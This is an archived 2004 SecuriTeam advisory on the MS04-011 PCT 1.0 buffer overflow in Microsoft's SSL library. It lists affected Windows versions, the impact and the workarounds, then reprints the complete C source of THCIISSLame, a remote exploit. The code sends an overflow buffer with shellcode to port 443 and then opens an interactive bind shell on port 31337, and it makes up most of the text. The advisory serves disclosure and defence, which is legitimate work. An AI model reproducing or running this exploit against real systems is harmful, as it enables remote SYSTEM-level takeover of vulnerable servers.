[NT] Microsoft SSL Library Remote Compromise Vulnerability (MS04-011, Exploit)

• Previous message: SecuriTeam: "[NT] Multiple Vulnerabilities in BitDefender Scan Online (ActiveX)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 22 Apr 2004 12:44:31 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Microsoft SSL Library Remote Compromise Vulnerability (MS04-011, Exploit)
------------------------------------------------------------------------

SUMMARY

ISS X-Force has discovered a remotely exploitable buffer overflow
condition in the Microsoft Secure Sockets Layer (SSL) library. SSL is an
encryption technology commonly used to secure Web and email
communications. A buffer overflow condition occurs when processing PCT 1.0
handshake packets that can lead to remote, privileged compromise of
affected Windows installations.

DETAILS

Affected Versions:
 * Microsoft Windows 2000 up to and including SP4
 * Microsoft Windows NT version 4 up to and including SP6a
 * Microsoft Windows XP up to SP1

Note: The SSL library included in Windows Server 2003 contains the
vulnerability. However, the PCT 1.0 protocol is disabled by default.

Impact:
If any SSL-enabled services are present, and both the PCT 1.0 and SSL 2.0
protocols are enabled, remote attackers may exploit the buffer overflow
condition to execute arbitrary code on vulnerable Windows server
installations. This code would run with local system privileges. The
protocols necessary for remote exploitation are enabled by default in
Windows 2000 and Windows NT version 4.

Common vectors for exploitation might include Internet Information Server
(IIS), Exchange Server, Active Directory, and potentially any software
making use of the Microsoft SSL library including unlisted third-party
software.

The severity of this vulnerability is compounded by the fact that SSL is
most often used to secure communications involving confidential or
valuable financial information, and that Firewalls and packet filtering
alone will not be able to stop attacks. X-Force believes that hackers will
aggressively target this vulnerability given the high-value nature of Web
sites protected by SSL.

Solution:
The PCT 1.0 protocol is a legacy protocol that is not required for secure
SSL communication. The PCT 1.0 protocol can be safely disabled as a
workaround for the vulnerability described in this advisory. However,
systems using Microsoft Message Queue or MSMQ cannot disable PCT 1.0
without impacting MSMQ. In this circumstance, SSL 2.0 can be safely
disabled to close the vulnerability. Successful exploitation of the
vulnerability requires that both PCT 1.0 and SSL 2.0 are enabled. The
vulnerability is removed if either PCT 1.0 or SSL 2.0 is disabled.

Customers are encouraged to immediately evaluate the two scenarios
described above and select a workaround that best applies to their
environment.

Microsoft has published a Knowledge Base article (187498) that describes
how to disable certain SSL protocols, including PCT 1.0, SSL 2.0 and SSL
3.0. Microsoft Knowledge Base article 187498 is available at the following
address:
 <http://support.microsoft.com/support/kb/articles/q187/4/98.asp>
http://support.microsoft.com/support/kb/articles/q187/4/98.asp

Additional Information:
Microsoft Security Bulletin MS04-011:
<http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx>
http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

Exploit:
/*****************************************************************************/
/* THCIISSLame 0.1 - IIS 5 SSL remote root exploit */
/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org) */
/* THC PUBLIC SOURCE MATERIALS */
/* */
/* Bug was found by Internet Security Systems */
/* Reversing credits of the bug go to Halvar Flake */
/* */
/* compile with MS Visual C++ : cl THCIISSLame.c */
/* */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX,
dvorak, */
/* scut, stealth, FtR and Random */
/*****************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

#define jumper "\xeb\x0f"
#define greetings_to_microsoft
"\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21"

char sslshit[] =
"\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";

char shellcode[] =
"\xeb\x23\x7a\x69\x02\x05\x6c\x59\xf8\x1d\x9c\xde\x8c\xd1\x4c"
"\x70\xd4\x03\xf0\x27\x20\x20\x30\x08\x57\x53\x32\x5f\x33\x32"
"\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d\x83\xed"
"\x2a\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b"
"\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01\xfb\x8b"
"\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b\x5b\x20"
"\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe\xac\x31"
"\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x05\x8d\x44\x45\x04"
"\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50\x52\x2b"
"\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f\xb6\x4d"
"\x05\x89\x44\x8d\xd8\xfe\x4d\x05\x75\xbe\xfe\x4d\x04\x74\x21"
"\xfe\x4d\x22\x8d\x5d\x18\x53\xff\xd0\x89\xc7\x6a\x04\x58\x88"
"\x45\x05\x80\x45\x77\x0a\x8d\x5d\x74\x80\x6b\x26\x14\xe9\x78"
"\xff\xff\xff\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46\x56\xff"
"\xd0\x97\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff\x55\xd4\x4e"
"\x56\x57\xff\x55\xcc\x53\x55\x57\xff\x55\xd0\x97\x8d\x45\x88"
"\x50\xff\x55\xe4\x55\x55\xff\x55\xe8\x8d\x44\x05\x0c\x94\x53"
"\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45"
"\xcc\x94\x57\x57\x57\x53\x53\xfe\xc6\x01\xf2\x52\x94\x8d\x45"
"\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53\x6a\x10\xfe\xce\x52"
"\x53\x53\x53\x55\xff\x55\xec\x6a\xff\xff\x55\xe0";

void usage();
void shell(int sock);

int main(int argc, char *argv[])
{
  unsigned int i,sock,sock2,addr,rc;
  unsigned char *badbuf,*p;
  unsigned long offset = 0x6741a1cd;
  unsigned long XOR = 0xffffffff;

  struct sockaddr_in mytcp;
  struct hostent * hp;
  WSADATA wsaData;

  printf("\nTHCIISSLame v0.1 - IIS 5.0 SSL remote root exploit\n");
  printf("tested on Windows 2000 Server german/english SP4\n");
  printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");

  if(argc<2 || argc>2)
   usage();

  badbuf = malloc(347);
  memset(badbuf,0,347);

  printf("\n[*] building buffer\n");

  p = badbuf;

  memcpy(p,sslshit,sizeof(sslshit));

  p+=sizeof(sslshit)-1;
  
  strcat(p,jumper);

  strcat(p,greetings_to_microsoft);

  offset^=XOR;
  strncat(p,(unsigned char *)&offset,4);

  strcat(p,shellcode);

  if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
  {
   printf("WSAStartup failed !\n");
   exit(-1);
  }
  
  hp = gethostbyname(argv[1]);

  if (!hp){
   addr = inet_addr(argv[1]);
  }
  if ((!hp) && (addr == INADDR_NONE) )
  {
   printf("Unable to resolve %s\n",argv[1]);
   exit(-1);
  }

  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  if (!sock)
  {
   printf("socket() error...\n");
   exit(-1);
  }
  
  if (hp != NULL)
   memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
  else
   mytcp.sin_addr.s_addr = addr;

  if (hp)
   mytcp.sin_family = hp->h_addrtype;
  else
   mytcp.sin_family = AF_INET;

  mytcp.sin_port=htons(443);

  printf("[*] connecting the target\n");

  rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct
sockaddr_in));
  if(rc==0)
  {
      send(sock,badbuf,346,0);
      printf("[*] Exploit send successfully ! Sleeping a while ....\n");
      Sleep(1000);
  }
  else
   printf("\nCan't connect to ssl port 443!\n");
   
  if(rc==0)
  {
   printf("[*] Trying to get a shell\n\n");
   sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
   mytcp.sin_port = htons(31337);
   rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp));
   if(rc!=0)
   {
     printf("can't connect to port 31337 ;( maybe firewalled ...\n");
     exit(-1);
   }
   shell(sock2);
  }

  shutdown(sock,1);
  closesocket(sock);

  free(badbuf);

  exit(0);
}
 
void usage()
{
 unsigned int a;
 printf("\nUsage: <Host>\n");
 printf("Sample: THCIISSLame 31.33.7.23\n\n");
 exit(0);
}

void shell(int sock)
{
 int l;
 char buf[1024];
 struct timeval time;
 unsigned long ul[2];

 time.tv_sec = 1;
 time.tv_usec = 0;

 while (1)
 {
  ul[0] = 1;
  ul[1] = sock;

  l = select (0, (fd_set *)&ul, NULL, NULL, &time);
  if(l == 1)
  {
   l = recv (sock, buf, sizeof (buf), 0);
   if (l <= 0)
   {
    printf ("bye bye...\n");
    return;
   }
  l = write (1, buf, l);
   if (l <= 0)
   {
    printf ("bye bye...\n");
    return;
   }
  }
  else
  {
   l = read (0, buf, sizeof (buf));
   if (l <= 0)
   {
    printf("bye bye...\n");
    return;
   }
   l = send(sock, buf, l, 0);
   if (l <= 0)
   {
    printf("bye bye...\n");
    return;
   }
  }
 }
}

ADDITIONAL INFORMATION

The information has been provided by Mark Dowd and Neel Mehta of the ISS
X-Force.

The exploit has been provided by: <mailto:johncybpk@gmx.net> johnny
cyberpunk of THC

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NT] Multiple Vulnerabilities in BitDefender Scan Online (ActiveX)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]